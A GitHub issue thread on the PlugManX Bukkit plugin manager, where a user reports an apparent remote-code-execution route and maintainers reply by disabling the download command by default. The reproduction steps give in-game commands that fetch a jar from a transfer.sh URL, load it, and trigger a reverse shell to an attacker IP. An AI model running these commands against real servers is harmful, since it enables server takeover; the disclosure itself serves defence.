Test-Account666 / PlugManX

Plugin manager for Bukkit servers.
https://www.spigotmc.org/resources/plugman-improved.88135/
MIT License

Report of an exploit in the [plugman] plugin #33

Closed PvPWorldPL closed 11 months ago

PvPWorldPL commented 11 months ago

Confirmation

Type

Plugin Bug

What happens?

I have identified a potential remote code execution (RCE) exploit in the [Plugman] plugin. Below are the details of the exploit along with the steps to reproduce:

Expected Behaviour

I expected Plugman to securely handle plugin loading without exposing vulnerabilities to remote code execution. Specifically, I expected that the plugin would properly validate and sanitize input, preventing the execution of malicious code during the loading process. I anticipated that Plugman would adhere to standard security practices to ensure the integrity and safety of the server environment.

How to Reproduce

  1. Install Plugman on your Spigot server.
  2. Execute the following commands in-game:
    /cpi lmfao.jar https://transfer.sh/get/zCONva/SpigotRCE-1.0-SNAPSHOT-shaded.jar
    /plugman load CommandPanels/panels/lmfao.jar.yml
  3. Enter one of the following commands in the chat:
    5170haxor linux yourreverseshellip
    # or
    5170haxor windows yourreverseshellip

Additional Info

This set of actions demonstrates the potential vulnerability in Plugman, allowing an attacker to exploit the plugin loading process for remote code execution. The provided code examples showcase how an unauthorized user can execute arbitrary commands on the server during the plugin loading process.

MGlolenstine commented 11 months ago

I don't think this is a problem in Plugman, as it does exactly what you tell it to.

How is Plugman supposed to know that the plugin does something you don't want? I've had plugins that turned on lights in my house... Would that be a problematic plugin?

The issue here is that you have access to the plugin folder. Access to plugin installation should only be done through the console and not through a player command.

Restrict that command and the RCE is gone :)

Kind regards, LifE.

PvPWorldPL commented 11 months ago

The PlaceholderAPI also had something similar; they were repeating the same thing as you until they finally understood that it should be blocked.

PvPWorldPL commented 11 months ago

I think it would be appropriate to somehow block it so that the option is disabled by default when it comes to downloads.

PvPWorldPL commented 11 months ago

https://github.com/TypicalModMaker/Griefing-Methods/blob/main/isnow_griefing.txt

Test-Account666 commented 11 months ago

I am going to disable the download command by default in the next update anyway.

But that wouldn't stop other plugins from downloading these files themselves...

Also, I'm unsure why this is included: /plugman load CommandPanels/panels/lmfao.jar.yml

PlugManX does not load plugins which are not inside the plugins directory.

The plugin you're loading would be CommandPanelspanelslmfao.jar.yml

Also, since this file doesn't end with .jar, PlugManX should refuse to load it.

I am going to investigate this further, in case I overlooked something.
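As an added illustration of the two checks Test-Account666 describes above (plugins directory only, .jar only), here is a hypothetical resolver in plain Java; it is not PlugManX's own code, the class and method names are assumptions, and it uses only the JDK so it runs without Bukkit:

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;

// Hypothetical helper (not PlugManX's code): maps a user-typed plugin name to a .jar
// that must sit directly inside the plugins directory. Callers still gate the command itself.
public final class PluginFileResolver {
    private final Path pluginsDir;

    public PluginFileResolver(Path pluginsDir) {
        // Normalise once so every comparison below is against the same absolute form.
        this.pluginsDir = pluginsDir.toAbsolutePath().normalize();
    }

    /** Returns the resolved path, or throws IllegalArgumentException if the input is not acceptable. */
    public Path resolve(String userInput) {
        if (userInput == null || userInput.isEmpty()) {
            throw new IllegalArgumentException("empty plugin name");
        }
        // Only a bare file name is accepted: a separator or ".." is an attempt to leave pluginsDir.
        if (userInput.contains("/") || userInput.contains("\\") || userInput.contains("..")) {
            throw new IllegalArgumentException("not a bare file name: " + userInput);
        }
        String fileName;
        if (userInput.toLowerCase(Locale.ROOT).endsWith(".jar")) {
            fileName = userInput;                 // "Foo.jar" as typed
        } else if (!userInput.contains(".")) {
            fileName = userInput + ".jar";        // "Foo" -> "Foo.jar"
        } else {
            throw new IllegalArgumentException("not a .jar file: " + userInput); // e.g. "lmfao.jar.yml"
        }
        Path candidate = pluginsDir.resolve(fileName).normalize();
        // Defence in depth: the resolved path must still be a direct child of pluginsDir.
        if (!pluginsDir.equals(candidate.getParent())) {
            throw new IllegalArgumentException("path escapes plugins directory: " + candidate);
        }
        return candidate;
    }

    public static void main(String[] args) {
        PluginFileResolver resolver = new PluginFileResolver(Paths.get("plugins"));
        String[] inputs = {"ExamplePlugin.jar", "ExamplePlugin", "CommandPanels/panels/lmfao.jar.yml", "../server.properties"};
        for (String in : inputs) {
            try {
                System.out.println("accept " + in + " -> " + resolver.resolve(in));
            } catch (IllegalArgumentException e) {
                System.out.println("reject " + in + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The first two constructed inputs resolve to plugins/ExamplePlugin.jar; the last two are refused, the third because of the extra extension and the path separators, the fourth because of "..".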

IAISI commented 11 months ago

Hack could be executed like this...

(two attached images)

and rentry.co has an sh script that would start a reverse shell...

Test-Account666 commented 11 months ago

> Hack could be executed like this...
>
> (two attached images)
>
> and rentry.co has an sh script that would start a reverse shell...

I understand, but as I said, the latest update disabled the download command by default.

Also, preventing the load of malicious plugins is not PlugManX's duty.

Just restart the server and it's going to load that plugin anyway.

IAISI commented 11 months ago

Yea well, hacked servers will have to be cleaned up manually; we did a full reinstall. Aside from PlugMan disabling this by default, I don't think there's much to be done here.

Test-Account666 commented 11 months ago

Well, I wish you a nice day and good luck with your server :)